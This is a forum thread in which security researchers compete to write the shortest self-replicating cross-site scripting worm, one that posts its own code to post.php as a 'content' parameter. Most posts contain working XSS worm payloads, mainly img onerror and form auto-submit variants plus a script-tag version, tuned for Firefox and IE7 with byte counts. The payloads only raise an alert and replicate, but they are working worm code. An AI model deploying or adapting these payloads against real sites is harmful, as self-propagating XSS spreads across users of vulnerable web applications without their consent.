i don't really care about capitalisation, TBH. as long as the code-length stays the same (if your injection is gonna fail because of code length, it will also do so in the second generation of the worm) and the functionality identical, i'd say it's a valid worm, IMO.

i did notice FF mangles the code in bwb's worm.. the weirdest thing i saw about it is that it somehow seemed to have changed the [0] to firstChild, i didn't expect FF to "fix" event handler JS code, too.
too bad, cause the [0] is also a nice trick.

@bwblabs
damn, you are right about <input name="content"> the quotes!!
that makes mine 2 bytes larger :(

so that makes mine.. 146 bytes for a general case exploitation.. and maybe 163 for ensuring the exact same content all the time (as rsnake asked).. I'll put my code next week (on wednesday), cuz I use a little trick to make the code a huge bunch of bytes smaller.. anyway, if you ask the code in private I may show it to you :P

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

I saw it and we are all doomed anyway ;)

Right - what I'm concerned about with the byte length is that we are assuming the content length of whatever input field you are submitting into is a fixed length and won't change once the user executes the worm, so code that resizes itself (bigger) is a non-starter.

Regarding the [0] trick - that's fine, sorry, I may have misread in a hurry. As long as we are assuming I can put anything above or below it that you'd find on a normal HTML page and it wouldn't break your code (including other non-disruptive scripts or html tags) that's fine.

- RSnake
Gotta love it. http://ha.ckers.org

hmm seems firefox adds all quotes back on if you leave them off :)

so my previous entry is invalid.

my current one (i'm losing track a littlebit here, dunno if this would be the smallest valid one?) (at least i assume it's valid, still can't test for IE7)

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

187 chars

<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>

181 chars, exact replication on Firefox, same length on IE.
Enough for now (daily job, real life and all).
If I've got something else I'll post it after Sirdarckcat ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

src=""

is the shortest thing (for IE & FF) - off 1 byte :-)

BTW. I'm working on a damn short thing too (no onerrors ;-) ...



Edited 1 time(s). Last edit at 01/04/2008 05:50PM by bwb labs.

Hehe, well ma1, you used one of the tricks (action=(method='post')+'.php'), but the best of all remains untouched.. that r0x

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/04/2008 05:58PM by sirdarckcat.

bwb labs Wrote:
-------------------------------------------------------
> src="" is the shortest thing (for IE & FF) - off 1
> byte :-)
>
> BTW. I'm working on a damn short thing too (no
> onerrors ;-) ...

it's not in the rules, so it doesn't matter much, but for Opera "." is the shortest, "" doesn't work.

<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>

176 chars.

in FF you can leave away the "this" keyword, cause that's the local scope already anyway.

can someone check if this is also the case in IE7?

Stop spamming my RSS feed, continue the conversation though ;x

Oops, important thread. Let me read this before I blabber away.



Edited 1 time(s). Last edit at 01/04/2008 06:09PM by Spyware.

165 ftw

<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>

Still, I'm not sure if it works in IE7.

@barbarianbob
sorry, but your payload gets translated when replicated to:
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

that's 178 bytes

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

hehe this is just the start, wait things get more interesting :) mmmmm 10 pints of larger seem to make sense of it all....

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

did I mention I was having a baby girl :) whoooaaaa I'm drunk a baby little girl hacker :) c'mon woah time I went 2 bed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yeah I'm avin a baby girl....sorry daddy moment here :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

hey I'm just intentionally making it harder for myself :P

Did I mention I'm having a baby girl? I'm so proud....ok sorry I'm a bit pissed but I will create better code than anyone that submits I promise my baby girl :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Quote
rsnake
@.mario - interesting... I always thought IE7.0 required var before variable definition.
(...) You can also type "<\/script>" to save two bytes.

var defines a local (function) variable (note that JavaScript only has function scope!), if you don't define a variable you're working in global space (which is nasty, but for worms who gives a damn ;-).
When evaluating "<\/script>" it becomes "</script>", so it might not replicate right ...



Edited 1 time(s). Last edit at 01/04/2008 07:19PM by bwb labs.

if you count every byte why use long names like "content"?

<b><img onerror="alert('xss');with(nextSibling)c.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=".">
<form><input name="c"></form></b>
(Ritz code with short name "c")

That saves you 12 bytes.
Or did I get something wrong?



Edited 1 time(s). Last edit at 01/04/2008 07:49PM by Reiners.

162 characters! :-D

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">

(again, not tested in IE7)

(edit: of course the last semicolon is not needed, duh)
(edit2: means i should also change the constant, which should be codesize-6)

i keep on debugging this thing (but it stays the same length), constant needs to be codesize-7



Edited 4 time(s). Last edit at 01/04/2008 07:53PM by ritz.

Quote
Reiners
if you count every byte why use long names like "content"?

Quote
rsnake
2) must self replicate the entire payload to a page called "post.php" as a parameter called "content"

reiners: it's because rsnake required the name to be "content". when writing a worm you can't control this name, because it has to correspond to the POST variable the server is expecting.

ouch, I had this weird feeling while pressing the post button that something is wrong ;) nevermind.

edit:
I've tested the last worms of Ritz and barbarianbob on IE7.0, all successfully.



Edited 1 time(s). Last edit at 01/04/2008 07:39PM by Reiners.

Quote
ritz

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,158);click()" type="image">

(again, not tested in IE7)

Had the same thought about using an image, nice trick with the substr! The submit works in IE 7, but this is posted:

content.x=0&content.y=0

By my knowledge IE only submits the value of a submit button if you really click on it ...

huhhh that is weird

hrmmm i think i see what's going on. if you click on an image, you generally also get the coordinates of the click. those are the .x and the .y, which are 0 of course because the click was generated ..

shit, back to the drawing board then

Quote
ritz
if you click on an image, you generally also get the coordinates of the click.

The coordinates are not the problem (happens in FF too), but the lack of the real content variable is the problem (doesn't happen in FF).

ah I was so scared that ritz had a smaller code than mine, I'm just happy it doesnt work on IE.. I love IE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

ok, does it work in IE if i set the type attribute back to some illegal value before submitting?

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

still 168 bytes, not bad.

if this does not work, how about clearing the type attribute:

with a zero (170)

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,163);type=0;submit()" type="image">

or with an empty string (171)

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,164);type='';submit()" type="image">

bwb labs Wrote:
-------------------------------------------------------
> if you click on an image, you generally also get
> the coordinates of the click.
> The coordinates are not the problem (happens in FF
> too), but the lack of the real content variable is
> the problem (doesn't happen in FF).

you sure? how does this happen? because if you fill in a value for a regular non-image element, it does submit.

also, if it sends coordinates on click, why not the value?

is it because of the image type?

ok, I'll show mine.. since almost all the tricks where revealed anyway..

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

that's the rule-compilant version, of 159 bytes

this is the small-notportable-but-effective version of 145 bytes:

<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/04/2008 08:27PM by sirdarckcat.